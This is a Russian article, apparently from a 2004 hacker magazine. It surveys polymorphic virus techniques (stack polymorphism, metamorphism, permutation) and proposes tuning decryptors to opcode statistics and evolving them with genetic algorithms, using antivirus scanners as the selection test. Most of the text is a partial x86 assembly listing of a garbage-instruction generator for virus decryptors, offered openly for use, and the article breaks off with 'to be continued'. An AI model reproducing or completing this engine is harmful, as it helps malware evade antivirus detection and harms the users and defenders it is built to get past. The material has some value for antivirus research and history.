Четыре.
Тяжёлые, как удар
"Кесарево кесарю — богу богово"
А такому, как я ткнуться куда?
Где для меня уготовано логово?

В.Маяковский

 

Полиморфизм всегда пользовался огромной
популярностью у программистов. Но шло время
и полиморфизм стал не столь распространен.
Многие стали считать, что это вчерашний
день. Я с ними соглашусь, но, как говорится:
"Не все йогурты одинаково полезны".
Классический полиморфизм в том виде, каким
он был раньше, дальше использоваться не
может. Сейчас мы рассмотрим последние
техники полиморфизма и перспективы их
применения.

Стэковый полиморфизм

Первым написал простейший стэковый движок
Rajaat, данный движок был очень простым и
маленьким. Далее, насколько я помню, была
парочка вариаций на данную тему. И
закончилось всё когда объединились Z0MBiE и
Vecna. Их творение получило модное
громогласное название — "Kewl Mutation Engine".
Данный движок без ложной скромности, можно
назвать шедевром стэкового полиморфизма.

Теперь мы рассмотрим в чём же заключается
суть стэкового полиморфизма. Весь код,
который мы хотим скрыть (зашифровать),
разбивается на двойные слова.

И после этого формируется следующий код:

;————;
push Шифруемый Код
push Шифруемый Код
…. ………….
push Шифруемый Код
jmp esp
;————;

Но такой код легко раскалывается даже
алгоритмическими методами, без
кодоэмуляции. Что делается чтобы этого не
происходило? Производится линейная мутация
кода, как вы видите инструкции в этом коде
влияют только на стэк. И мы можем
отмутировать инструкцию — "push Шифруемый
Код", следующим образом:

;————;
mov eax,234
mov edx, Шифруемый Код-234
add edx,eax
xchg edx,eax
push eax
;————;

И каждую инструкцию из этого блока мы тоже
можем сильно преобразовать. Этим мы
заставим эмулировать каждую инструкцию
нашего кода. А как вы знаете, есть так
называемая глубина эмуляции — это
количество инструкций, на котором эмуляция
прекращается.

Теперь давайте поговорим об актуальности
стэкового полиморфизма и его перспективах.
С выходом новых процессоров запрещено
исполнение кода в стэке. И это используется
как в SP2 для Windows XP, так и будет
использоваться в Longhorn. Так что актуальность
данного вида полиморфизма стремится к нулю.

Метаморфизм

Я к данному виду полиморфизма отношу два
типа мутаций:

1) Когда весь код вместе с движком
разбивается на блоки и затем производится
перестановка данных блоков и их связь.

2) Когда весь код вируса представлен в виде
псевдокода и хранится в зашифрованном виде.
И на базе этого псевдокода, генерируется
каждый раз новый код.

Данные техники является достаточно
сложными и не очень приятными. По следующим
причинам:

  • И в первом, и втором случаях достаточно
    сложно написать универсальный движок. По
    этой причине каждый раз эту технику
    необходимо реализовывать заново.

  • В первом случае получается ограниченное
    количество мутаций.

  • Во втором случае возможно
    детектирование по зашифрованной части
    кода.

Пермутация

Пермутация это преобразование уже готового
кода. В этом направлении на данный момент
наиболее продвинулся Z0MBiE. Но ещё в его
старых движках, встречались благодарности
некому Lord_ASD. Дальше него в этой области
продвинулись Vecna и SBVC. В чём же заключается
пермутация? Базовым алгоритмом
пермутирующих движков является
дизассемблирование кода с последующей его
мутацией и ассемблированием.

Теперь рассмотрим пример алгоритма
простейшего пермутирующего движка:

1) Дизассемблируется по длинам все
инструкции нашего кода и отмечаются
условные и безусловные переходы.
2) Инструкции заменяются синонимичными и
между ними вставляются мусорные инструкции. 

Например:

;—-[Были инструкции]—-;
… …………
mov eax,12345678
push eax
…. …………
;————;

Далее эти инструкции преобразовались к
виду:

;—-[Стали инструкции]—-;
… …………
xor eax,eax
nop
add eax,12345678
nop
push eax
…. ………….
;————;

3) Пересчитываются все переходы.

Данный вид полиморфизма является одним из
самых перспективных. По следующим причинам:

  • Удобство (не лёгкость) написания движка.
  • Высокий уровень мутаций.
  • Необходимость эмуляции всех инструкций.

Не смотря на то, что данный вид
полиморфизма известен уже достаточно давно,
он не получил большого распространения, из-за
сложности реализации.

Статистические методы и Генетические
алгоритмы

В данной части рассмотрим наиболее
оптимальные модификации классических
полиморфных движков.

1) Статистические методы

Вы никогда не задумывались почему ваши
полиморфные движки так быстро
детектируются? Вроде и инструкции
использовали те же, что и обычные программы,
и все виды переходов и подпрограмм. А всё
равно детектируются! 

Да, инструкции были использованы те же, но в
том ли количестве? Антивирусы так же
смотрят на статистику встречи опкодов. Вы
уже наверное догадались о чём пойдёт речь
дальше? 

Для того, чтобы определить с какой
вероятностью генерировать ту или иную
инструкцию, мы должны собрать
статистические данные по обыкновенным
программам. Для этого мы можем либо
написать сами программу, либо
воспользоваться программой от Z0MBiE. После
того, как мы проанализировали на количество
различных опкодов  множество программ,
мы должны рассчитать мат. ожидания (средние)
встречи различных опкодов. И на уже на их
основе построим таблицу вероятностей
встречи тех или иных опкодов в обыкновенных
программах.

После этого ваши декрипторы будут
практически идентичны обыкновенным
программам по статиситике опкодов.

2) Генетические алгоритмы

Теория Дарвина утверждает, что все
организмы изменяются и совершенствуются в
процессе эволюции. Более приспособленные
особи к своей среде обитания имеют больше
возможностей выжить и принести потомство.
Благодаря наследственности (генетической
информации) родители передают потомкам
наиболее необходимую для выживания в
данной среде информацию. Из-за этого
механизма весь вид будет изменяться и в
конце концов его выживаемость значительно
увеличиться.

Генетический алгоритм — это реализация
эволюционной теории в виде программы. ГА
работают с популяцией особей и 
расставляют им вероятности по
характеристикам её "выживаемости" или
"приспособленности". Наиболее 
приспособленные особи — это те особи,
которые достаточно "хорошо" решают
поставленную задачу. Данные особи
скрещиваются друг с другом. Поэтому все
хорошие характеристики остаются в
популяции, а плохие уходят вместе с их не
"приспособленными" носителями.

Генетические Алгоритмы чаще всего
используют две функции:

1) Кроссовер — это скрещивание наиболее
выживаемых особей.
2) Мутация — это изменение случайных
характеристик особи.

Теперь перейдём к реализации эволюционных
алгоритмов в полиморфных движках. Мы будем
применять ГА к нашему полиморфному движку
со статистическими вероятностями. 

Алгоритм генератора мусора с
статистическими вероятностями и ГА:

1) Генерируется код по статистическим
вероятностям
2) Выбираются случайно и мутируют два стат.
признака (1 раз в 10 поколений). Это наша
реализация мутации.
3) Выбираются два определяющих стат.
признака и изменяются каждое поколение. Это
наш кроссовер.

В качестве отсеивающего признака эволюции
будут выступать антивирусные программы.

Если особь активна — считается что она
прошла отбор. И она продолжает свой подъём
или спуск по лестнице эволюции.

В качестве примера реализации данной
техники привожу программу:

; ;
;%%%%%;
;
ГЕНЕРАТОР МУСОРНЫХ
ИНСТРУКЦИЙ V. 0.4 (x) 2004 СЛОН http://slon.wronger.com ;

;%%%%%;
;
Использование: mov edi, БУФЕР
ДЛЯ КОДА ;

;
mov ecx, ДЛИНА КОДА ;
;
mov ebx, НЕ ИСПОЛЬЗУЕМЫЕ
РЕГИСТРЫ(_all) ;

;
call garbage ;
;————;
;
Результат:
сгенерированный код в edi ;

;%%%%%;
;
ВЕРСИЯ 0.3 Генерация
инструкций по заданным статистическим ;

;
характеристикам (они
получены в результате анализа ;

;
большого количества
файлов формата "PE") ;

;————;
;
ВЕРСИЯ 0.2 Добавлены новые
инструкции x86, так же добавлены ;

;
инструкции сопроцессора
(x87) ;

;————;
;
ВЕРСИЯ 0.1 Реализация
многих инструкций x86 процессора, ;

;
случайная комбинация
инструкций ;

;%%%%%;

;—-[Главная подпрограмма генератора мусора]—-;

garbage: ; Подпрограмма
генерации

;
мусорных инструкций
push edx ;
Сохраняем в стэке
push ecx ; edx, ecx, esi, ebp, ecx, eax
push esi ; 
push ebp ;
push ebx ;
push eax ;

call delta_offset ; 
delta_offset: pop ebp ;
Получаем
дельта смещение

sub ebp,offset delta_offset ;

call r_init ; Инициалицируем ГСЧ
__st__:
test ecx,ecx ;
Если все инструкции
jz landing ;
сгенерированы, то на
выход

mov eax,21 ; Выбираем случайным
образом

call brandom32 ;
вариант генерации
мусорных

;
инструкций
shl eax,1 ;
Умножаем eax на 2

call __freq__ ; Выбираем блок
инструкций по

;
статистической
вероятности

test eax,eax ;
Если не выбрали, то
пытаемся

jz __st__ ;
снова

lea esi,[ebp+mega_table] ; В esi смещение
на таблицу

;
относительных смещений
add esi,eax ;
к esi добавляем eax
xor eax,eax ;
Обнуляем eax
lodsw ;
В ax загружаем 
;
относительное смещение от
;
метки __st__
lea esi,[ebp+__st__] ;
В esi кладём
смещение 

;
метки __st__
add eax,esi ;
Добавляем смещение 
;
подпрограммы
call eax ;
Вызываем её
jmp __st__ ;
Переход на __st__

;—-[Завершение работы генератора мусора]—-;

landing:
inc [ebp+__generation] ;
Увеличиваем
счётчик поколений

cmp [ebp+__generation],10 ; Если это не 10
поколение, то

jne __ne__ ;
идём на выход

mov [ebp+__generation],0 ; Сбрасываем
счётчик поколений

call gen_mutation ; Вызываем
изменение 1 случ.

;
мат. ожидания

mov [ebp+__cross1],ecx ; Выбираем 1 опр.
фактор

;
эволюции

call gen_mutation ; Вызываем
изменение 2 случ.

;
мат. ожидания

mov [ebp+__cross2],ecx ; Выбираем 2 опр.
фактор

;
эволюции
__ne__:
mov ecx,[ebp+__cross1] ;
Производим
селекцию 1 опр.

call gen_crossover ;
фактора
эволюции

mov ecx,[ebp+__cross1] ; Производим
селекцию 2 опр.

call gen_crossover ;
фактора
эволюции

pop eax ;
pop ebx ;
pop ebp ;
pop esi ;
Восстанавливаем
регистры

pop ecx ;
pop edx ;

ret ; Возврат из подпрограммы

;—-[Подпрограмма выбора стат. вероятностей]—-;

__freq__:
push eax ;
Сохраняем eax в стэке

lea esi,[ebp+__freq_table] ; Загружаем
указатель на таблицу

add esi,eax ;
с мат. ожиданиями
lodsw ;
Загружаем в ax мат.ожидание
mov edx,eax ;
Переносим её в edx

mov eax,1001 ; Генерируем
случайное число

call brandom32 ;
в интервале 0..1000

cmp edx,eax ; Проверяем попали ли
мы?

jge __exit__ ;
Если попали, то на
выход

mov 4 ptr [esp],0 ;
Нет обнулим
верхушку стэка

__exit__:
pop eax ;
Восстанавливаем eax из
стэка

ret ;
Возврат из подпрограммы

;—-[Подпрограмма изменения мат. ожидания]—-;

gen_mutation:
mov eax,21 ;
Выбираем случайным
образом

call brandom32 ;
вариант генерации
мусорных

;
инструкций
shl eax,1 ;
Умножаем eax на 2

lea esi,[ebp+__freq_table] ; В esi
смещение на таблицу

;
мат. ожиданий опкодов
add esi,eax ;
к esi добавляем eax
xor eax,eax ;
Обнуляем eax
lodsw ;
В ax загружаем мат.
;
ожидание

call brandom32 ; Генерируем СЧ в
диапазоне

sub esi,2 ;
0..мат.ожидание-1 и
уменьшаем

;
esi на 2
sub 2 ptr [esi],ax ;
Вычитаем из мат.
ожидания

;
Наше случайное число
push eax ;
Сохраняем в стэке СЧ

mov eax,21 ; Выбираем случайным
образом

call brandom32 ;
вариант генерации
мусорных

;
инструкций
shl eax,1 ;
Умножаем eax на 2

mov ecx,eax ;

lea esi,[ebp+__freq_table] ; В esi
смещение на таблицу

;
мат. ожиданий опкодов
add esi,eax ;
к esi добавляем eax

pop eax ; Восстанавливаем из
стэка СЧ

add 2 ptr [esi],ax ;
И добавляем его
к другому

;
Мат. ожиданию
ret ;
Возврат из подпрограммы

;—-[Подпрограмма селекции опр. фактора
эволюции]—-;

gen_crossover:

mov eax,21 ; Выбираем случайным
образом

call brandom32 ;
вариант генерации
мусорных

;
инструкций
shl eax,1 ;
Умножаем eax на 2

lea esi,[ebp+__freq_table] ; В esi
смещение на таблицу

;
мат. ожиданий опкодов
add esi,eax ;
к esi добавляем eax
xor eax,eax ;
Обнуляем eax
lodsw ;
В ax загружаем мат.
;
ожидание

call brandom32 ; Генерируем СЧ в
диапазоне

sub esi,2 ;
0..мат.ожидание-1 и
уменьшаем

;
esi на 2
sub 2 ptr [esi],ax ;
Вычитаем из мат.
ожидания

;
Наше случайное число
push eax ;
Сохраняем в стэке СЧ

lea esi,[ebp+__freq_table] ; В esi
смещение на таблицу

;
мат. ожиданий опкодов
add esi,ecx ;
к esi добавляем eax

pop eax ; Восстанавливаем из
стэка СЧ

add 2 ptr [esi],ax ;
И добавляем его
к другому

;
Мат. ожиданию
ret ;
Возврат из подпрограммы

;—-[Генерация инструкций JXX SHORT — 0x70..0x7f]—-;

__jxx_short:
mov eax,50 ;
Генерируем
случайное число

call brandom32 ;
в диапазоне 0..49
push eax ;
Сохраняем eax в стэке
add eax,2 ;
Добавляем длину
перехода

cmp eax,ecx ;
Проверяем не больше
ли длины

;
Всех инструкций
pop eax ;
Восстанавливаем из
стэка eax

jle __gen1__ ;
Если число
превышает длину

ret ;
то выходим из
подпрограммы

__gen1__: ;
push eax ;
Кладём eax опять в стэк
mov eax,10 ;
Выбираем случайным
образом

call brandom32 ;
число от 0..9
add al,70h ;
Добавляем 70h
stosb ;
и кладём его в буфер
pop eax ;
Вынимаем из стэка eax и
stosb ;
кладём в буфер
mov edx,eax ;
Кладём число в edx
push ecx ;
Сохраняем ecx в стэке
mov ecx,edx ;
Генерируем
рекурсивно

call garbage ;
мусор между
переходом

pop ecx ;
Восстанавливаем ecx
;
В итоге у нас получается
;
случайно выбранный,
;
условный переход:
;
…………………………
;
jae next
;
mov eax,0
;
next: nop
; .
………………………..
sub ecx,2 ;
Уменьшаем счётчик на
2

sub ecx,edx ;
И на длину перехода
ret ;
Возврат из подпрограммы

;—-[Генерация инструкций NOT/NEG — 0xf7]————;

__not_r32:
cmp cl,2 ;
Если длина
генерируемой

jge __g1__ ;
инструкции меньше 2,
то

ret ;
Возврат из подпрограммы
__g1__:
mov al,0f7h ;
Помещаем в al — 0f7h
stosb ;
и кладём его в буфер
mov dl,0d0h ;
Помещаем в dl — 0d0h 
mov eax,2 ;
Генерируем случайное
число

call brandom32 ;
в диапазоне 0..1
shl eax,3 ;
Умножаем его на 8
add dl,al ;
Добавляем к dl — al
call free_reg ;
Вызываем
подпрограмму 

;
получения свободных 
;
регистров
add al,dl ;
Добавляем к al — dl
stosb ;
и кладём его в буфер
;
В итоге у нас получается
;
случайно выбранная
;
инструкция NOT/NEG:
;
…………………………
;
not eax
;
…………………………
sub ecx,2 ;
Уменьшаем счётчик на
2

ret ;
Возврат из подпрограммы

;—-[Генерация инструкций JXX NEAR — 0x0f 0x80..0x0f
0x89]—-;

__jxx_near:
mov eax,50 ;
Генерируем
случайное число

call brandom32 ;
в диапазоне 0..49
push eax ;
Сохраняем его в стэке
add eax,6 ;
Добавляем длину
перехода

cmp eax,ecx ;
Проверяем не больше
длины

;
Всех инструкций
pop eax ;
Восстанавливаем eax из
стэка

jle __gen2__ ;
Если число
превышает длину

ret ;
то выходим из
подпрограммы

__gen2__: ;
push eax ;
Сохраняем в стэке eax
mov al,0fh ;
Помещаем в al — 0fh
stosb ;
и кладём его в буфер
mov eax,10 ;
Выбираем случайным
образом

call brandom32 ;
число от 0..9
;
add al,80h ;
Добавляем 80h
stosb ;
и кладём его в буфер
pop eax ;
Вынимаем из стэка eax
stosd ;
Помещаем его в буфер
mov edx,eax ;
Кладём в edx — eax
push ecx ;
Сохраняем ecx в стэке
mov ecx,edx ;
Генерируем
рекурсивно

call garbage ;
мусор между
переходом

pop ecx ;
Восстанавливаем ecx
;
В итоге у нас получается
;
случайно выбранный,
;
условный, переход:
;
…………………………
;
je next
;
push 0
;
next: push 64
;
…………………………
sub ecx,6 ;
Уменьшаем счётчик на
6

sub ecx,edx ;
И на длину
инструкций

;
ret ;
Возврат из подпрограммы

;—-[Генерация инструкций сопроцессора —
0xdc]—-;

__x87:
cmp cl,2 ;
Если длина
генерируемой

jge __g2__ ;
инструкции меньше 2,
то

ret ;
Возврат из подпрограммы
__g2__:
mov al,0dch ;
Кладём в al — 0dch
stosb ;
И помещаем al в буфер
mov eax,02fh ;
Генерируем
случайное число

call brandom32 ;
в интервале 0..2eh
add al,0c0h ;
Добавляем к числу 0c0h
stosb ;
и помещаем сумму в
буфер

;
В итоге у нас получается
;
случайно выбранная
;
инструкция сопроцессора:
;
…………………………
;
fadd st(0),st
;
…………………………
sub ecx,2 ;
Уменьшаем счётчик на
2

ret ;
Возврат из подпрограммы

;—-[Генерация инструкций сравнения — 0x3a]—-;

__cmp_r32_r32:
cmp cl,2 ;
Если длина
генерируемой

jge __g3__ ;
инструкции меньше 2,
то

ret ;
Возврат из подпрограммы
__g3__:
mov dl,3ah ;
Помещаем в dl — 03ah
mov eax,3 ;
Получаем случайное
число

call brandom32 ;
в диапазоне 0..2
add al,dl ;
Добавляем к al — dl
stosb ;
Затем помещаем al в
буфер

call rnd_reg ;
Получаем случайный
регистр

shl eax,3 ;
Умножаем eax на 8
add al,0c0h ;
Добавляем к al — 0c0h
mov dl,al ;
помещаем в dl — al
call rnd_reg ;
Получаем случайный
регистр

add al,dl ;
Добавляем к al — dl
stosb ;
И помещаем al в буфер
;
В итоге у нас получается
;
случайно выбранная
;
инструкция CMP:
;
…………………………
;
cmp eax,esp
;
…………………………
sub ecx,2 ;
Уменьшаем счётчик на
2

ret ;
Возврат из подпрограммы

;—-[Генерация инструкций XOR — 0x33]—-;

__xor_r32_r32:
cmp cl,2 ;
Если длина
генерируемой

jge __g4__ ;
инструкции меньше 2,
то

ret ;
Возврат из подпрограммы
__g4__:
mov al,33h ;
Помещаем в al — 33h
stosb ;
И затем кладём это в
буфер

call free_reg ;
Вызываем
подпрограмму 

;
получения свободных 
;
регистров
shl eax,3 ;
Умножаем eax на 8
add al,0c0h ;
Добавляем к al — 0c0h
mov dl,al ;
помещаем в dl — al
call rnd_reg ;
Получаем случайный
регистр

add al,dl ;
Добавляем к al — dl
stosb ;
И помещаем al в буфер
;
В итоге у нас получается
;
случайно выбранная
;
инструкция XOR:
;
…………………………
;
xor eax,esp
;
…………………………
sub ecx,2 ;
Уменьшаем счётчик на
2

ret ;
Возврат из подпрограммы

;—-[Генерация инструкций TEST — 0x84]—-;

__test_r32_r32:
cmp cl,2 ;
Если длина
генерируемой

jge __g5__ ;
инструкции меньше 2,
то

ret ;
Возврат из подпрограммы
__g5__:
mov dl,084h ;
Помещаем в dl — 084h
mov eax,2 ;
Получаем случайное
число

call brandom32 ;
в диапазоне 0..1
add al,dl ;
Добавляем к al — dl
stosb ;
И затем кладём это в
буфер

call rnd_reg ;
Вызываем
подпрограмму 

;
получения случайного 
;
регистра
add al,0c0h ;
Добавляем к al — 0c0h
mov dl,al ;
помещаем в dl — al
call rnd_reg ;
Получаем случайный
регистр

add al,dl ;
Добавляем к al — dl
stosb ;
И помещаем al в буфер
;
В итоге у нас получается
;
случайно выбранная
;
инструкция TEST:
;
…………………………
;
test eax,esp
;
…………………………
sub ecx,2 ;
Уменьшаем счётчик на
2

ret ;
Возврат из подпрограммы

(Продолжение следует)

Оставить мнение

Check Also

Пишешь на С++ или .NET? Даем скидку 50% на Deleaker, программу для поиска утечек памяти

Deleaker — это программа для разработчиков под Windows, пишущих на C++. Она ищет утечки па…